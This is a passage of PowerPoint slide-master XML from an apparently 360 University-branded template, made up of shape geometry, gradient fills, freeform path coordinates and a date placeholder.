              <a:defRPr spc="200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sz="1600" dirty="0"/>
              <a:t>university.360.cn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2440712487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97117"/>
            <a:ext cx="12192000" cy="502848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="89000">
                <a:srgbClr val="00AB7A">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="45000">
                <a:srgbClr val="00AB7A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aseline="-25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1739" y="6320292"/>
            <a:ext cx="1028887" cy="271009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7817226-A4A8-4CA8-8499-073E4B5E2127}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/7/25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069579" y="6502853"/>
            <a:ext cx="789305" cy="278947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ct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CE3A6F2A-4BD1-4B71-A85C-4AC4B8E4C9A9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10" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="564" y="236492"/>
            <a:ext cx="251119" cy="309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34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="69031" y="219203"/>
            <a:ext cx="145443" cy="145443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 58 w 65"/>
              <a:gd name="T1" fmla="*/ 25 h 65"/>
              <a:gd name="T2" fmla="*/ 40 w 65"/>
              <a:gd name="T3" fmla="*/ 25 h 65"/>
              <a:gd name="T4" fmla="*/ 40 w 65"/>
              <a:gd name="T5" fmla="*/ 7 h 65"/>
              <a:gd name="T6" fmla="*/ 33 w 65"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 25 w 65"/>
              <a:gd name="T9" fmla="*/ 7 h 65"/>
              <a:gd name="T10" fmla="*/ 25 w 65"/>
              <a:gd name="T11" fmla="*/ 11 h 65"/>
              <a:gd name="T12" fmla="*/ 25 w 65"/>
              <a:gd name="T13" fmla="*/ 25 h 65"/>
              <a:gd name="T14" fmla="*/ 7 w 65"/>
              <a:gd name="T15" fmla="*/ 25 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 65"/>
              <a:gd name="T17" fmla="*/ 32 h 65"/>
              <a:gd name="T18" fmla="*/ 7 w 65"/>
              <a:gd name="T19" fmla="*/ 40 h 65"/>
              <a:gd name="T20" fmla="*/ 25 w 65"/>
              <a:gd name="T21" fmla="*/ 40 h 65"/>
              <a:gd name="T22" fmla="*/ 25 w 65"/>
              <a:gd name="T23" fmla="*/ 57 h 65"/>
              <a:gd name="T24" fmla="*/ 33 w 65"/>
              <a:gd name="T25" fmla="*/ 65 h 65"/>
              <a:gd name="T26" fmla="*/ 40 w 65"/>
              <a:gd name="T27" fmla="*/ 57 h 65"/>
              <a:gd name="T28" fmla="*/ 40 w 65"/>
              <a:gd name="T29" fmla="*/ 40 h 65"/>
              <a:gd name="T30" fmla="*/ 45 w 65"/>
              <a:gd name="T31" fmla="*/ 40 h 65"/>
              <a:gd name="T32" fmla="*/ 58 w 65"/>
              <a:gd name="T33" fmla="*/ 40 h 65"/>
              <a:gd name="T34" fmla="*/ 65 w 65"/>
              <a:gd name="T35" fmla="*/ 32 h 65"/>
              <a:gd name="T36" fmla="*/ 58 w 65"/>
              <a:gd name="T37" fmla="*/ 2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5" h="65">
                <a:moveTo>
                  <a:pt x="58" y="25"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25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3"/>
                  <a:pt x="37" y="0"/>
                  <a:pt x="33" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28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25" y="25"/>
                  <a:pt x="25" y="25"/>
                  <a:pt x="25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3" y="25"/>
                  <a:pt x="0" y="28"/>
                  <a:pt x="0" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36"/>
                  <a:pt x="3" y="40"/>
                  <a:pt x="7" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40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61"/>
                  <a:pt x="28" y="65"/>
                  <a:pt x="33" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="65"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="40" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45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62" y="40"/>
                  <a:pt x="65" y="36"/>
                  <a:pt x="65" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="28"/>
                  <a:pt x="62" y="25"/>
                  <a:pt x="58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34"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="226448" y="341831"/>
            <a:ext cx="77055" cy="77055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 58 w 65"/>
              <a:gd name="T1" fmla="*/ 25 h 65"/>
              <a:gd name="T2" fmla="*/ 40 w 65"/>
              <a:gd name="T3" fmla="*/ 25 h 65"/>
              <a:gd name="T4" fmla="*/ 40 w 65"/>
              <a:gd name="T5" fmla="*/ 7 h 65"/>
              <a:gd name="T6" fmla="*/ 33 w 65"/>
              <a:gd name="T7" fmla="*/ 0 h 65"/>
              <a:gd name="T8" fmla="*/ 25 w 65"/>
              <a:gd name="T9" fmla="*/ 7 h 65"/>
              <a:gd name="T10" fmla="*/ 25 w 65"/>
              <a:gd name="T11" fmla="*/ 11 h 65"/>
              <a:gd name="T12" fmla="*/ 25 w 65"/>
              <a:gd name="T13" fmla="*/ 25 h 65"/>
              <a:gd name="T14" fmla="*/ 7 w 65"/>
              <a:gd name="T15" fmla="*/ 25 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 65"/>
              <a:gd name="T17" fmla="*/ 32 h 65"/>
              <a:gd name="T18" fmla="*/ 7 w 65"/>
              <a:gd name="T19" fmla="*/ 40 h 65"/>
              <a:gd name="T20" fmla="*/ 25 w 65"/>
              <a:gd name="T21" fmla="*/ 40 h 65"/>
              <a:gd name="T22" fmla="*/ 25 w 65"/>
              <a:gd name="T23" fmla="*/ 57 h 65"/>
              <a:gd name="T24" fmla="*/ 33 w 65"/>
              <a:gd name="T25" fmla="*/ 65 h 65"/>
              <a:gd name="T26" fmla="*/ 40 w 65"/>
              <a:gd name="T27" fmla="*/ 57 h 65"/>
              <a:gd name="T28" fmla="*/ 40 w 65"/>
              <a:gd name="T29" fmla="*/ 40 h 65"/>
              <a:gd name="T30" fmla="*/ 45 w 65"/>
              <a:gd name="T31" fmla="*/ 40 h 65"/>
              <a:gd name="T32" fmla="*/ 58 w 65"/>
              <a:gd name="T33" fmla="*/ 40 h 65"/>
              <a:gd name="T34" fmla="*/ 65 w 65"/>
              <a:gd name="T35" fmla="*/ 32 h 65"/>
              <a:gd name="T36" fmla="*/ 58 w 65"/>
              <a:gd name="T37" fmla="*/ 2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65" h="65">
                <a:moveTo>
                  <a:pt x="58" y="25"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25"/>
                  <a:pt x="40" y="25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3"/>
                  <a:pt x="37" y="0"/>
                  <a:pt x="33" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28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25" y="25"/>
                  <a:pt x="25" y="25"/>
                  <a:pt x="25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3" y="25"/>
                  <a:pt x="0" y="28"/>
                  <a:pt x="0" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36"/>
                  <a:pt x="3" y="40"/>
                  <a:pt x="7" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40"/>
                  <a:pt x="25" y="40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61"/>
                  <a:pt x="28" y="65"/>
                  <a:pt x="33" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="65"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="40" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                  <a:pt x="40" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                  <a:pt x="45" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="40"/>
                  <a:pt x="58" y="40"/>
                  <a:pt x="58" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="40"/>
                  <a:pt x="65" y="36"/>
                  <a:pt x="65" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="28"/>
                  <a:pt x="62" y="25"/>
                  <a:pt x="58" y="25"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="5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2" name="组合 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10482901" y="170733"/>
            <a:ext cx="1375983" cy="344775"/>
            <a:chOff x="7550392" y="-466606"/>
            <a:chExt cx="1031987" cy="258581"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="555963"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7591672" y="-422211"/>
              <a:ext cx="66982" cy="65424"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 40"/>
                <a:gd name="T1" fmla="*/ 15 h 39"/>
                <a:gd name="T2" fmla="*/ 25 w 40"/>
                <a:gd name="T3" fmla="*/ 15 h 39"/>
                <a:gd name="T4" fmla="*/ 25 w 40"/>
                <a:gd name="T5" fmla="*/ 4 h 39"/>
                <a:gd name="T6" fmla="*/ 20 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 39"/>
                <a:gd name="T8" fmla="*/ 16 w 40"/>
                <a:gd name="T9" fmla="*/ 4 h 39"/>
                <a:gd name="T10" fmla="*/ 16 w 40"/>
                <a:gd name="T11" fmla="*/ 15 h 39"/>
                <a:gd name="T12" fmla="*/ 5 w 40"/>
                <a:gd name="T13" fmla="*/ 15 h 39"/>
                <a:gd name="T14" fmla="*/ 0 w 40"/>
                <a:gd name="T15" fmla="*/ 20 h 39"/>
                <a:gd name="T16" fmla="*/ 0 w 40"/>
                <a:gd name="T17" fmla="*/ 20 h 39"/>
                <a:gd name="T18" fmla="*/ 5 w 40"/>
                <a:gd name="T19" fmla="*/ 24 h 39"/>
                <a:gd name="T20" fmla="*/ 16 w 40"/>
                <a:gd name="T21" fmla="*/ 24 h 39"/>
                <a:gd name="T22" fmla="*/ 16 w 40"/>
                <a:gd name="T23" fmla="*/ 35 h 39"/>
                <a:gd name="T24" fmla="*/ 20 w 40"/>
                <a:gd name="T25" fmla="*/ 39 h 39"/>
                <a:gd name="T26" fmla="*/ 25 w 40"/>
                <a:gd name="T27" fmla="*/ 35 h 39"/>
                <a:gd name="T28" fmla="*/ 25 w 40"/>
                <a:gd name="T29" fmla="*/ 24 h 39"/>
                <a:gd name="T30" fmla="*/ 35 w 40"/>
                <a:gd name="T31" fmla="*/ 24 h 39"/>
                <a:gd name="T32" fmla="*/ 40 w 40"/>
                <a:gd name="T33" fmla="*/ 20 h 39"/>
                <a:gd name="T34" fmla="*/ 40 w 40"/>
                <a:gd name="T35" fmla="*/ 20 h 39"/>
                <a:gd name="T36" fmla="*/ 35 w 40"/>
                <a:gd name="T37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39">
                  <a:moveTo>
                    <a:pt x="35" y="15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2"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="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15"/>
                    <a:pt x="0" y="17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2" y="24"/>
                    <a:pt x="5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7"/>
                    <a:pt x="18" y="39"/>
                    <a:pt x="20" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="39"/>
                    <a:pt x="25" y="37"/>
                    <a:pt x="25" y="3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8" y="24"/>
                    <a:pt x="40" y="22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7"/>
                    <a:pt x="38" y="15"/>
                    <a:pt x="35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7550392" y="-466606"/>
              <a:ext cx="151098" cy="154214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 84 w 91"/>
                <a:gd name="T1" fmla="*/ 22 h 91"/>
                <a:gd name="T2" fmla="*/ 83 w 91"/>
                <a:gd name="T3" fmla="*/ 20 h 91"/>
                <a:gd name="T4" fmla="*/ 60 w 91"/>
                <a:gd name="T5" fmla="*/ 3 h 91"/>
                <a:gd name="T6" fmla="*/ 59 w 91"/>
                <a:gd name="T7" fmla="*/ 2 h 91"/>
                <a:gd name="T8" fmla="*/ 58 w 91"/>
                <a:gd name="T9" fmla="*/ 2 h 91"/>
                <a:gd name="T10" fmla="*/ 56 w 91"/>
                <a:gd name="T11" fmla="*/ 1 h 91"/>
                <a:gd name="T12" fmla="*/ 55 w 91"/>
                <a:gd name="T13" fmla="*/ 1 h 91"/>
                <a:gd name="T14" fmla="*/ 51 w 91"/>
                <a:gd name="T15" fmla="*/ 1 h 91"/>
                <a:gd name="T16" fmla="*/ 50 w 91"/>
                <a:gd name="T17" fmla="*/ 0 h 91"/>
                <a:gd name="T18" fmla="*/ 48 w 91"/>
                <a:gd name="T19" fmla="*/ 0 h 91"/>
                <a:gd name="T20" fmla="*/ 47 w 91"/>
                <a:gd name="T21" fmla="*/ 0 h 91"/>
                <a:gd name="T22" fmla="*/ 45 w 91"/>
                <a:gd name="T23" fmla="*/ 0 h 91"/>
                <a:gd name="T24" fmla="*/ 8 w 91"/>
                <a:gd name="T25" fmla="*/ 20 h 91"/>
                <a:gd name="T26" fmla="*/ 7 w 91"/>
                <a:gd name="T27" fmla="*/ 21 h 91"/>
                <a:gd name="T28" fmla="*/ 6 w 91"/>
                <a:gd name="T29" fmla="*/ 23 h 91"/>
                <a:gd name="T30" fmla="*/ 5 w 91"/>
                <a:gd name="T31" fmla="*/ 24 h 91"/>
                <a:gd name="T32" fmla="*/ 5 w 91"/>
                <a:gd name="T33" fmla="*/ 25 h 91"/>
                <a:gd name="T34" fmla="*/ 4 w 91"/>
                <a:gd name="T35" fmla="*/ 26 h 91"/>
                <a:gd name="T36" fmla="*/ 0 w 91"/>
                <a:gd name="T37" fmla="*/ 46 h 91"/>
                <a:gd name="T38" fmla="*/ 5 w 91"/>
                <a:gd name="T39" fmla="*/ 66 h 91"/>
                <a:gd name="T40" fmla="*/ 31 w 91"/>
                <a:gd name="T41" fmla="*/ 88 h 91"/>
                <a:gd name="T42" fmla="*/ 32 w 91"/>
                <a:gd name="T43" fmla="*/ 89 h 91"/>
                <a:gd name="T44" fmla="*/ 34 w 91"/>
                <a:gd name="T45" fmla="*/ 89 h 91"/>
                <a:gd name="T46" fmla="*/ 36 w 91"/>
                <a:gd name="T47" fmla="*/ 90 h 91"/>
                <a:gd name="T48" fmla="*/ 45 w 91"/>
                <a:gd name="T49" fmla="*/ 91 h 91"/>
                <a:gd name="T50" fmla="*/ 48 w 91"/>
                <a:gd name="T51" fmla="*/ 91 h 91"/>
                <a:gd name="T52" fmla="*/ 53 w 91"/>
                <a:gd name="T53" fmla="*/ 90 h 91"/>
                <a:gd name="T54" fmla="*/ 54 w 91"/>
                <a:gd name="T55" fmla="*/ 90 h 91"/>
                <a:gd name="T56" fmla="*/ 58 w 91"/>
                <a:gd name="T57" fmla="*/ 89 h 91"/>
                <a:gd name="T58" fmla="*/ 59 w 91"/>
                <a:gd name="T59" fmla="*/ 89 h 91"/>
                <a:gd name="T60" fmla="*/ 61 w 91"/>
                <a:gd name="T61" fmla="*/ 88 h 91"/>
                <a:gd name="T62" fmla="*/ 62 w 91"/>
                <a:gd name="T63" fmla="*/ 88 h 91"/>
                <a:gd name="T64" fmla="*/ 64 w 91"/>
                <a:gd name="T65" fmla="*/ 87 h 91"/>
                <a:gd name="T66" fmla="*/ 65 w 91"/>
                <a:gd name="T67" fmla="*/ 86 h 91"/>
                <a:gd name="T68" fmla="*/ 67 w 91"/>
                <a:gd name="T69" fmla="*/ 85 h 91"/>
                <a:gd name="T70" fmla="*/ 68 w 91"/>
                <a:gd name="T71" fmla="*/ 85 h 91"/>
                <a:gd name="T72" fmla="*/ 91 w 91"/>
                <a:gd name="T73" fmla="*/ 46 h 91"/>
                <a:gd name="T74" fmla="*/ 72 w 91"/>
                <a:gd name="T75" fmla="*/ 77 h 91"/>
                <a:gd name="T76" fmla="*/ 24 w 91"/>
                <a:gd name="T77" fmla="*/ 64 h 91"/>
                <a:gd name="T78" fmla="*/ 8 w 91"/>
                <a:gd name="T79" fmla="*/ 62 h 91"/>
                <a:gd name="T80" fmla="*/ 8 w 91"/>
                <a:gd name="T81" fmla="*/ 62 h 91"/>
                <a:gd name="T82" fmla="*/ 18 w 91"/>
                <a:gd name="T83" fmla="*/ 14 h 91"/>
                <a:gd name="T84" fmla="*/ 67 w 91"/>
                <a:gd name="T85" fmla="*/ 27 h 91"/>
                <a:gd name="T86" fmla="*/ 83 w 91"/>
                <a:gd name="T87" fmla="*/ 29 h 91"/>
                <a:gd name="T88" fmla="*/ 83 w 91"/>
                <a:gd name="T89" fmla="*/ 29 h 91"/>
                <a:gd name="T90" fmla="*/ 72 w 91"/>
                <a:gd name="T91" fmla="*/ 7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1" h="91">
                  <a:moveTo>
                    <a:pt x="84" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="22"/>
                    <a:pt x="84" y="21"/>
                    <a:pt x="83" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="21"/>
                    <a:pt x="83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77" y="12"/>
                    <a:pt x="69" y="6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8" y="2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2"/>
                    <a:pt x="57" y="2"/>
                    <a:pt x="56" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="2"/>
                    <a:pt x="56" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="1"/>
                    <a:pt x="55" y="1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4" y="1"/>
                    <a:pt x="53" y="1"/>
                    <a:pt x="52" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="52" y="1"/>
                    <a:pt x="51" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="1"/>
                    <a:pt x="51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4" y="0"/>
                    <a:pt x="44" y="0"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1"/>
                    <a:pt x="15" y="9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0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2"/>
                    <a:pt x="6" y="22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3"/>
                    <a:pt x="6" y="23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5"/>
                    <a:pt x="5" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="5" y="25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1" y="32"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53"/>
                    <a:pt x="2" y="60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10" y="77"/>
                    <a:pt x="19" y="85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2" y="89"/>
                    <a:pt x="32" y="89"/>
                    <a:pt x="33" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="89"/>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="89"/>
                    <a:pt x="34" y="90"/>
                    <a:pt x="34" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="90"/>
                    <a:pt x="35" y="90"/>
                    <a:pt x="36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9" y="91"/>
                    <a:pt x="42" y="91"/>
                    <a:pt x="45" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="91"/>
                    <a:pt x="46" y="91"/>
                    <a:pt x="47" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="91"/>
                    <a:pt x="47" y="91"/>
                    <a:pt x="48" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="51" y="90"/>
                    <a:pt x="53" y="90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55" y="90"/>
                    <a:pt x="56" y="89"/>
                    <a:pt x="57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8" y="89"/>
                    <a:pt x="58" y="89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89"/>
                    <a:pt x="60" y="88"/>
                    <a:pt x="60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88"/>
                    <a:pt x="61" y="88"/>
                    <a:pt x="62" y="88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62" y="87"/>
                    <a:pt x="63" y="87"/>
                    <a:pt x="63" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="87"/>
                    <a:pt x="64" y="87"/>
                    <a:pt x="64" y="87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5" y="87"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="66" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="86"/>
                    <a:pt x="66" y="86"/>
                    <a:pt x="67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5"/>
                    <a:pt x="68" y="85"/>
                    <a:pt x="68" y="85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82" y="77"/>
                    <a:pt x="91" y="62"/>
                    <a:pt x="91" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="37"/>
                    <a:pt x="88" y="29"/>
                    <a:pt x="84" y="22"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="72" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="78"/>
                    <a:pt x="65" y="80"/>
                    <a:pt x="61" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="82"/>
                    <a:pt x="35" y="76"/>
                    <a:pt x="24" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="63"/>
                    <a:pt x="19" y="61"/>
                    <a:pt x="18" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="59"/>
                    <a:pt x="9" y="61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5" y="57"/>
                    <a:pt x="4" y="52"/>
                    <a:pt x="4" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="33"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="13"/>
                    <a:pt x="25" y="11"/>
                    <a:pt x="29" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="9"/>
                    <a:pt x="55" y="15"/>
                    <a:pt x="67" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="28"/>
                    <a:pt x="71" y="30"/>
                    <a:pt x="72" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="32"/>
                    <a:pt x="81" y="30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5" y="34"/>
                    <a:pt x="86" y="40"/>
                    <a:pt x="86" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="58"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="72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1" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-437788"/>
              <a:ext cx="111377" cy="96578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 67 w 67"/>
                <a:gd name="T1" fmla="*/ 20 h 57"/>
                <a:gd name="T2" fmla="*/ 47 w 67"/>
                <a:gd name="T3" fmla="*/ 0 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 67"/>
                <a:gd name="T5" fmla="*/ 0 h 57"/>
                <a:gd name="T6" fmla="*/ 0 w 67"/>
                <a:gd name="T7" fmla="*/ 3 h 57"/>
                <a:gd name="T8" fmla="*/ 5 w 67"/>
                <a:gd name="T9" fmla="*/ 8 h 57"/>
                <a:gd name="T10" fmla="*/ 47 w 67"/>
                <a:gd name="T11" fmla="*/ 8 h 57"/>
                <a:gd name="T12" fmla="*/ 58 w 67"/>
                <a:gd name="T13" fmla="*/ 20 h 57"/>
                <a:gd name="T14" fmla="*/ 58 w 67"/>
                <a:gd name="T15" fmla="*/ 22 h 57"/>
                <a:gd name="T16" fmla="*/ 58 w 67"/>
                <a:gd name="T17" fmla="*/ 23 h 57"/>
                <a:gd name="T18" fmla="*/ 57 w 67"/>
                <a:gd name="T19" fmla="*/ 23 h 57"/>
                <a:gd name="T20" fmla="*/ 6 w 67"/>
                <a:gd name="T21" fmla="*/ 23 h 57"/>
                <a:gd name="T22" fmla="*/ 6 w 67"/>
                <a:gd name="T23" fmla="*/ 32 h 57"/>
                <a:gd name="T24" fmla="*/ 57 w 67"/>
                <a:gd name="T25" fmla="*/ 32 h 57"/>
                <a:gd name="T26" fmla="*/ 58 w 67"/>
                <a:gd name="T27" fmla="*/ 32 h 57"/>
                <a:gd name="T28" fmla="*/ 58 w 67"/>
                <a:gd name="T29" fmla="*/ 32 h 57"/>
                <a:gd name="T30" fmla="*/ 58 w 67"/>
                <a:gd name="T31" fmla="*/ 37 h 57"/>
                <a:gd name="T32" fmla="*/ 47 w 67"/>
                <a:gd name="T33" fmla="*/ 48 h 57"/>
                <a:gd name="T34" fmla="*/ 5 w 67"/>
                <a:gd name="T35" fmla="*/ 48 h 57"/>
                <a:gd name="T36" fmla="*/ 0 w 67"/>
                <a:gd name="T37" fmla="*/ 53 h 57"/>
                <a:gd name="T38" fmla="*/ 0 w 67"/>
                <a:gd name="T39" fmla="*/ 57 h 57"/>
                <a:gd name="T40" fmla="*/ 46 w 67"/>
                <a:gd name="T41" fmla="*/ 57 h 57"/>
                <a:gd name="T42" fmla="*/ 60 w 67"/>
                <a:gd name="T43" fmla="*/ 52 h 57"/>
                <a:gd name="T44" fmla="*/ 67 w 67"/>
                <a:gd name="T45" fmla="*/ 37 h 57"/>
                <a:gd name="T46" fmla="*/ 67 w 67"/>
                <a:gd name="T47" fmla="*/ 2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7" h="57">
                  <a:moveTo>
                    <a:pt x="67" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="9"/>
                    <a:pt x="58" y="0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2" y="8"/>
                    <a:pt x="5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53" y="8"/>
                    <a:pt x="58" y="13"/>
                    <a:pt x="58" y="20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8" y="43"/>
                    <a:pt x="53" y="48"/>
                    <a:pt x="47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2" y="48"/>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="53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1" y="57"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="60" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="48"/>
                    <a:pt x="67" y="41"/>
                    <a:pt x="67" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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7840127" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 21 h 58"/>
                <a:gd name="T2" fmla="*/ 0 w 66"/>
                <a:gd name="T3" fmla="*/ 38 h 58"/>
                <a:gd name="T4" fmla="*/ 20 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 51 w 66"/>
                <a:gd name="T7" fmla="*/ 58 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 43 h 58"/>
                <a:gd name="T10" fmla="*/ 66 w 66"/>
